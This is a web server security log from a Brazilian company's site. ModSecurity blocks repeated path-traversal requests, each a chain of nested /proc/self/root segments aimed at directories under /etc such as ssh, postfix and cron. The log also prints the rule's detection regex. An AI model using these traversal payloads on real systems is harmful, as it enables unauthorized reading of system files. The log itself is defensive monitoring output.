[Mon Mar 16 11:28:34.482639 2026] [:error] [pid 32654:tid 140411557287680] [client 74.7.243.203:58930] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTkglT9VtDQc7bgUym0gAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:35.776673 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.243.203:58932] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTk7ABkC4fWIHEf8HjaAAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:37.066689 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.243.203:58936] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTlZqj1wV0Si-Okefj7QAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:39.255741 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.243.203:58946] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTlglT9VtDQc7bgUym2QAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:40.567057 2026] [:error] [pid 10709:tid 140411699963648] [client 74.7.243.203:48722] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTmBXjF1vJNtV6CWrvzQAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:41.659482 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:48724] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTmf9ocpUE4ed4uDznRAAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:42.985096 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.243.203:48738] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTmnbQATo66fKoS7xGJAAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:44.187375 2026] [:error] [pid 32654:tid 140411641214720] [client 74.7.243.203:48752] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTnAlT9VtDQc7bgUym4AAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:44.238852 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.244.31:36668] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgTnLABkC4fWIHEf8HjawAAAEs"]
[Mon Mar 16 11:28:45.520779 2026] [:error] [pid 10709:tid 140411691570944] [client 74.7.243.203:48756] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTnRXjF1vJNtV6CWrvzwAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:46.860701 2026] [:error] [pid 10709:tid 140411641214720] [client 74.7.243.203:48772] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTnhXjF1vJNtV6CWrv0QAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:48.176921 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.243.203:48788] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgToHjZBu2q05ozVU9OlAAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:49.475171 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.243.203:48796] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTobysWC90G-1nBrA89wAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:50.988110 2026] [:error] [pid 10651:tid 140411674785536] [client 74.7.243.203:48914] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTorysWC90G-1nBrA8-QAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:52.262940 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.243.203:48926] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTpI6lpbStxTqkSktlhgAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:53.549438 2026] [:error] [pid 11972:tid 140411741927168] [client 74.7.243.203:48930] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTpZqj1wV0Si-Okefj8QAAAAA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:54.906532 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.243.203:48946] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTptSswJuvopo3lOhX9gAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:57.247469 2026] [:error] [pid 21946:tid 140411565680384] [client 74.7.243.203:48956] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTqXbQATo66fKoS7xGKQAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:58.556467 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.243.203:48962] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTqtSswJuvopo3lOhX9wAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:28:59.888363 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.243.203:48968] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTq7ABkC4fWIHEf8HjbAAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:01.136364 2026] [:error] [pid 10709:tid 140411616036608] [client 74.7.243.203:37078] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTrRXjF1vJNtV6CWrv0wAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:02.284817 2026] [:error] [pid 10709:tid 140411548894976] [client 74.7.243.203:37090] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTrhXjF1vJNtV6CWrv1AAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
